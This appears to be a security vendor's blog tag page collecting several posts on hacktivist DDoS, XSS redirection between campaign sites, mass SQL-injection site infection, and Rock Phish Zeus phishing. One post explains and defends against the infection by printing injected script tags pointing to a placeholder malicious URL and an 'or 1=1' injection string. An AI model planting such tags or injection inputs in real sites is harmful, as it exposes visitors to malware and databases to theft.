antivirus

While most of the cyber crime activities that we see being conducted on The Internet are being driven by illicit financial incentives, there also appears to be type of malicious activity being driven by other motivations altogether – “Hacktivism”.

Hacktivism is best explained as a combination of “hacking” and “activism”, traditionally rooted in cultural and/or geopolitical unrest. As Wikipedia defines it, Hacktivism is “…the nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends. These tools include web site defacements, redirects, denial-of-service attacks, information theft, web site parodies, virtual sit-ins, virtual sabotage, and software development.”

In fact, Hacktivist incidents stretch back over 20 years, but only in the past couple of years have they become more frequent, and more devastatingly malicious.

The most notable incident of regional Hacktivism were the Distributed Denial of Service (DDoS) attacks against government and corporate websites in Estonia in 2007, which actually began a worldwide dialog on the real threat of “Cyber Attacks” and the impact on national infrastructure.

However, the latest victims of Hacktivism appear to be several U.S. websites in Eastern Europe belonging to Radio Free Europe/Radio Liberty. It was reported Monday that “…the attack, which started on April 26, initially targeted the website of RFE/RL’s Belarus Service, but quickly spread to other sites…”

According to a statement on the Radio Free Europe/Radio Liberty website, RFE/RL had been “…hit before by denial-of-service attacks, but this attack was unprecedented in its scale, as RFE/RL websites received up to 50,000 fake hits every second.”

While incidents of Hacktivism are not new, they are beginning to become a lot more frequent — perhaps due to the availability of tools to conduct hacktivist mischief, but also perhaps due to the ubiquitous social networking mechanisms which can now be used as to build consensus when times of cultural or political unrest present the opportunity.

In any event, Hacktivism is becoming a disturbing trend, and one which can have serious ripple effects that interfere with Internet operational continuity — sometimes in ways which we may have not even thought of yet.

“Fergie”, a.k.a. Paul Ferguson
Internet Security Intelligence
Advanced Threats Research

ShareThis

Senators Hillary Clinton and Barack Obama battle it out on all fronts, literally. The tight contest, where until now no clear frontrunner emerges, isn’t likely to be dictated by just the debates. So we see extra-political battles in different arenas. The Web would seem one likely sphere where the one hopeful nominee who dominates gains a lot.

The most recent Internet-related clash between these two involved redirection: one candidate’s Web site leads users to the site of the other. Users viewing Obama’s site were redirected to Clinton’s through an attack called cross-site scripting (XSS). Researchers were successful in reversing the attack, too, exploiting vulnerabilities and revealing these glitches to the site owners.

Internet-related incidents are not new in the coming U.S. presidential elections. TrendLabs, as early as November last year, reported on spamming activities that were seen as campaign materials for Ron Paul. Clinton herself was featured in a spam run that spewed malware into systems, turning them into bots to further spread spam.

This time, however, the cross-site scripting attacks are seen as benign as no malware were involved. With the increasing hype around spamming and other malicious activities, this might be a move driven by caution. Those who do it may have realized that malicious activities, once exposed, will inevitably taint individuals and their appearances to the media, or to everyone in general.

Researchers are still investigating how this type of attack could be used in more malicious criminal activity.

ShareThis

Some days ago our researchers from TrendLabs discovered an attack on Web sites from the European region. Since the number of compromised sites was low, and because they were immediately cleaned, we figured it might be just a proof of concept.

F-Secure researchers also announced a similar attack where more than 500,000 sites were affected.

The infection code was a <script > tag that pointed to a malicious URL. The new discovery here is that these malicious tags were inserted between the usual text tags <title > </title >. For example
<title >My Website <script src=http://maliciousURL.com > </script > </title >
and into <meta >, <a href= > <div class=”myclass” > etc. like for example <a href=http://goodURL <script src=http://maliciousURL > </script > >.

An infected Web site would display its infection in the browser window title:

While neither <title > nor <meta > tags are supposed to support <script >, some browsers are prone to syntax errors. They interpret any script tags wherever they are placed.
The visitors of the affected Web sites are thus exposed to threats active on their systems.

The massive infection of Web sites was done supposedly through automated SQL injection. This is not the first instance of this type of attack; unfortunately, it would not be the last time either.

What’s notable about SQL injections is that such attacks can be triggered any time, regardless of the security patch of the SQL server behind. The success of the attack depends on the Web application that uses SQL servers. A Web site with no field content control is pretty easy to fool into sending to the server a simple SQL command. To simplify:

“SELECT * FROM bank_data WHERE Userid=blah or 1=1”

The moral of this story is that cyber criminals will have an easy game as long as Web sites are made by construction kit users or from inexperienced developers that may not consider field content checking.

Trend Micro users are already protected, first through a generic detection of the script — as HTML_IFRAME.YC — and certainly through Web Threat Protection.

ShareThis

SAN MATEO, Calif. - Untangle today announced an OEM agreement with Kaspersky Lab, a leading developer of secure content management solutions and winner of last summer's Anti-Virus Fight Club. The agreement enables Untangle customers to protect their network endpoints by deploying the cutting edge Virus Blocker Powered by Kaspersky with just 1 click."At Untangle, we're always looking for the best apps to offer our community. Every time we've tested anti-virus software, Kaspersky came out on top," said Untangle CTO, Dirk Morris. "Typica …

Our friends from RSA have recently reported about the latest one-two punch employed by the infamous Rock Phish gang (also reported here and here). Best known for their easy-to-use kits that yield professional looking phishing pages, Rock Phish now introduces information-stealing malware — dubbed as the Zeus Trojan.

This attack is reminiscent of the Bank of America phishing attack, which we reported several days ago, wherein users are prompted to install a “digital certificate” in order to access the bank’s online login page. Incidentally, the phishing page was also Rock Phish.

And apparently there were more: Trend Micro Advanced Threats Researcher Paul Ferguson and the TrendLabs Content Security team came across a couple of malicious “certificates” detected as TSPY_PAPRAS.AC and TSPY_PAPRAS.AD. These spyware each target the Comerica and Colonial banks, respectively.

Below are screenshots of the phishing email and Web page targeting Comerica account holders:

Traditional phishing involves phishers sending out email messages that lead users to a fake Web site resembling login pages of certain institutions or companies. This time they’ve made sure they can get sensitive user information even without getting users to log on to some fake page. They do this by planting a spy in users’ systems so any relevant user action can be transmitted to a remote server. Unprotected users thus stand to lose sensitive information.

This recent development even makes it more important to remind users to be wary of clicking links in email communications, and to keep scanning engines up-to-date.

Addtional text by Paul Oliveria

ShareThis

The founder of the world's first computer virus scanner will give the keynote address at Roanoke College's graduation ceremony on May 3.John McAfee, founder of McAfee Inc. and a 1967 graduate of Roanoke College, will address about 429 graduates at the 10 a.m. ceremony on the John Turbyfill Quadrangle. If it rains, the ceremony will be moved indoors to the Bast Center.McAfee will also receive an honorary doctor of science degree at the ceremony.After graduating, McAfee worked with a number of technology companies, including General Ele …